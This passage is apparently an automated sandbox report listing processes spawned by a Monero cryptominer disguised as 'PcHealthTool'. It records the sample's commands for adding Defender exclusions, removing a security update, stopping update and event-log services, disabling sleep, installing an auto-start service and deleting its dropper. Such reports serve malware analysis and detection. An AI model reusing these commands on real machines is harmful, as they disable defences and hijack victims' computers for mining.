                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                            Imagebase:0x7ff6ac780000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:09:44:17
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff70ecf0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\wusa.exe
                                            Wow64 process (32bit):false
                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff6c87f0000
                                            File size:345'088 bytes
                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:09:44:21
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:22
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            Imagebase:0x7ff6ed240000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe delete "PcHealthTool"
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto"
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:33
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe start "PcHealthTool"
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:37
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:38
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
                                            Imagebase:0x7ff790150000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:39
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:40
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:41
                                            Start time:09:44:53
                                            Start date:25/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe"
                                            Imagebase:0x140000000
                                            File size:827'374'560 bytes
                                            MD5 hash:286405D179DCBBC1ACB0B5957B45CDF7
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:42
                                            Start time:09:44:50
                                            Start date:25/08/2024
                                            Path:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\ProgramData\PcHealthTool\HealthTool.exe
                                            Imagebase:0x140000000
                                            File size:831'071'200 bytes
                                            MD5 hash:FCE277E4928FDE19CD8BAD5CE1997792
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            General

                                            Target ID:43
                                            Start time:09:44:46
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\choice.exe
                                            Wow64 process (32bit):false
                                            Commandline:choice /C Y /N /D Y /T 3
                                            Imagebase:0x7ff7aa6b0000
                                            File size:35'840 bytes
                                            MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:44
                                            Start time:09:44:51
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                            Imagebase:0x7ff73c1e0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:45
                                            Start time:09:44:51
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:46
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff790150000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:47
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:48
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:49
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:50
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\wusa.exe
                                            Wow64 process (32bit):false
                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                            Imagebase:0x7ff743070000
                                            File size:345'088 bytes
                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:51
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:52
                                            Start time:09:44:56
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:53
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:54
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:55
                                            Start time:09:44:57
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:56
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:57
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                            Imagebase:0x7ff798da0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:58
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:59
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:60
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:61
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:62
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            Imagebase:0x7ff71e800000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:63
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:64
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\powercfg.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            Imagebase:0x7ff72d760000
                                            File size:96'256 bytes
                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:65
                                            Start time:09:44:58
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:66
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:67
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
